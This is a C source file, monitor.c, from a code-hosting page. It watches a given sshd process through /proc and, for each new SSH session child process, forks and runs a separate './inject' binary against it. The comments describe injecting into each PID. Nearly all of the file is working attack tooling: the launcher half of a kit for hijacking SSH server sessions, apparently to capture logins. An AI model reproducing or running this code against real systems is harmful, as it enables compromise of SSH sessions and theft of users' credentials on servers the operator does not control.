-
Notifications
You must be signed in to change notification settings - Fork 54
/
Copy pathmonitor.c
102 lines (83 loc) · 1.93 KB
/
monitor.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <string.h>
typedef void(*callback)(char *);
typedef char bool;
#define TRUE 1
#define FALSE 0
unsigned short pids[1024];
unsigned short pidIndex=0;
// Add our PID to the list of seen
void addPidToSeen(int pid) {
pids[pidIndex] = pid;
pidIndex++;
}
// Check to see if we have already injected into this PID
bool hasSeenPid(int pid) {
int i=0;
for(i=0; i<pidIndex; i++) {
if (pids[i] == pid) {
return TRUE;
}
}
return FALSE;
}
// Responsible for monitoring SSH processes
void monitorForSSH(int ppid, callback cb) {
DIR *d;
FILE *fd;
struct dirent *dir;
char buffer[1024];
char line[1024];
char search[1024];
snprintf(search, sizeof(search), "PPid:\t%d", ppid);
d = opendir("/proc/");
if (d) {
while ((dir = readdir(d)) != NULL) {
snprintf(buffer, sizeof(buffer), "/proc/%s/status", dir->d_name);
fd = fopen(buffer, "r");
if (fd != NULL) {
while(fgets(line, sizeof(line), fd) != NULL) {
if (strstr(line, search) != NULL) {
if (!hasSeenPid(atoi(dir->d_name))) {
cb(dir->d_name);
addPidToSeen(atoi(dir->d_name));
}
break;
}
}
fclose(fd);
}
}
closedir(d);
}
}
void launchInject(char* pid) {
char *vals[3];
vals[0] = "./inject";
vals[1] = pid;
vals[2] = NULL;
printf("[*] New PID found, injecting into: %s\n\n", pid);
if (fork() == 0) {
// Within a child process, spawn our injector
printf("[*] Spawning child inject process\n");
execve("./inject", vals, NULL);
}
}
int main(int argc, char **argv) {
struct timespec ts;
ts.tv_nsec = 1000000000 / 5;
ts.tv_sec = 0;
memset(pids, 0, sizeof(pids));
if (argc != 2) {
printf("Usage: %s SSHD_PID\n", argv[0]);
return 2;
}
printf("[*] Starting monitor for PPID %d\n", atoi(argv[1]));
// Endless loop to monitor sessions
while(1) {
nanosleep(&ts, NULL);
monitorForSSH(atoi(argv[1]), &launchInject);
}
}